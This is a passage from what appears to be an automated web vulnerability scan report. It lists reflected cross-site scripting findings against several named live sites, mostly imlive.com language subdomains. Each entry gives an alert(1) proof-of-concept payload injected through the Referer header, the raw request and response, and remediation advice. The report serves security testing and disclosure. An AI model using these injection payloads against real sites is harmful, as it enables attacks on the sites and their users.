Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3539e'-alert(1)-'9d756dfe67

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dxo1q555z104ijrh0grwy255; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dxo1q555z104ijrh0grwy255; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:05 GMT; path=/
Set-Cookie: spvdr=vd=6cd394f6-d606-4c64-b829-a89aa950913a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:05 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 19156
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=3539e'-alert(1)-'9d756dfe67&iy=dallas&id=44&iu=1&vd=6cd394f6-d606-4c64-b829-a89aa950913a';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1003. http://jp.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c88b2'-alert(1)-'2a63c42b092 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c88b2'-alert(1)-'2a63c42b092

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oepmbi550nrpuoqre0yxtl55; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oepmbi550nrpuoqre0yxtl55; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:14 GMT; path=/
Set-Cookie: spvdr=vd=f2e25211-0621-46c6-829a-5ba89927f0bd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 237403
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=jp.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=c88b2'-alert(1)-'2a63c42b092&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=f2e25211-0621-46c6-829a-5ba89927f0bd';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1004. http://mx.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd73'-alert(1)-'7a8d4483e55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8dd73'-alert(1)-'7a8d4483e55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=e0di5ly4hulhx1ricawutjay; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=e0di5ly4hulhx1ricawutjay; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:19 GMT; path=/
Set-Cookie: spvdr=vd=78c765b8-58c9-4c8f-9d32-6bb2ed79e374&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 18360
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8dd73'-alert(1)-'7a8d4483e55&iy=dallas&id=44&iu=1&vd=78c765b8-58c9-4c8f-9d32-6bb2ed79e374';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1005. http://mx.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71b4f'-alert(1)-'69efbaaf3ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71b4f'-alert(1)-'69efbaaf3ed

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqmym355qhamz4e4nwtenj55; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nqmym355qhamz4e4nwtenj55; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
Set-Cookie: spvdr=vd=e2799011-b63f-4a62-8294-050f2716e0c7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:27 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 209339
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=mx.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=71b4f'-alert(1)-'69efbaaf3ed&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=e2799011-b63f-4a62-8294-050f2716e0c7';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1006. http://nl.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6e9'-alert(1)-'53afcdd47c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d6e9'-alert(1)-'53afcdd47c4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=osznmv30dz5lk1efwgosicb0; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:17 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=osznmv30dz5lk1efwgosicb0; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:17 GMT; path=/
Set-Cookie: spvdr=vd=7e825ee8-0af9-4f6e-ad3f-421aa265f191&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 18003
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=5d6e9'-alert(1)-'53afcdd47c4&iy=dallas&id=44&iu=1&vd=7e825ee8-0af9-4f6e-ad3f-421aa265f191';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1007. http://nl.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c478e'-alert(1)-'b70284934ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c478e'-alert(1)-'b70284934ea

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vnk3tz55c511nzjrq4wzjm55; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:23 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vnk3tz55c511nzjrq4wzjm55; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:23 GMT; path=/
Set-Cookie: spvdr=vd=08345a42-5221-4393-baa8-9e58c3153060&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 219007
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=nl.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=c478e'-alert(1)-'b70284934ea&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=08345a42-5221-4393-baa8-9e58c3153060';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1008. http://no.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffa0b'-alert(1)-'f8b58c61969 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ffa0b'-alert(1)-'f8b58c61969

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=s4lpe0i25kprudjwdtqhki22; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4lpe0i25kprudjwdtqhki22; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:22 GMT; path=/
Set-Cookie: spvdr=vd=6ef62b25-e784-4359-8a09-6efa75feae6a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 18139
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=no.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=ffa0b'-alert(1)-'f8b58c61969&iy=dallas&id=44&iu=1&vd=6ef62b25-e784-4359-8a09-6efa75feae6a';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1009. http://no.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5a6'-alert(1)-'f51a024305a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7a5a6'-alert(1)-'f51a024305a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xruybr45zgaxrtrnycfgzv55; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xruybr45zgaxrtrnycfgzv55; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:26 GMT; path=/
Set-Cookie: spvdr=vd=cc9cb5cb-4e7e-4acf-9032-0ff8302a46f4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:26 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:26 GMT
Connection: close
Content-Length: 221880
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=no.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=7a5a6'-alert(1)-'f51a024305a&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=cc9cb5cb-4e7e-4acf-9032-0ff8302a46f4';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1010. http://onset.freedom.com/fi/analytics/cms/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript inline comment. The payload 30512*/alert(1)//6a54575b69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30512*/alert(1)//6a54575b69
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:19 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28760

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
:50";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com|entertainment|events|events|root";
/** domain=events.cbs6albany.com **/

/** referer=http://www.google.com/search?hl=en&q=30512*/alert(1)//6a54575b69 **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)
//if(navigator.appVersion.indexOf('MSIE')>
...[SNIP]...

4.1011. http://pu.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98560'-alert(1)-'35d8e8b408e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=98560'-alert(1)-'35d8e8b408e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zzrb5eqoneilkk55unwnx4mi; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zzrb5eqoneilkk55unwnx4mi; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:24 GMT; path=/
Set-Cookie: spvdr=vd=45abd12d-aecf-4a11-8c1f-a3d2332e1d24&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
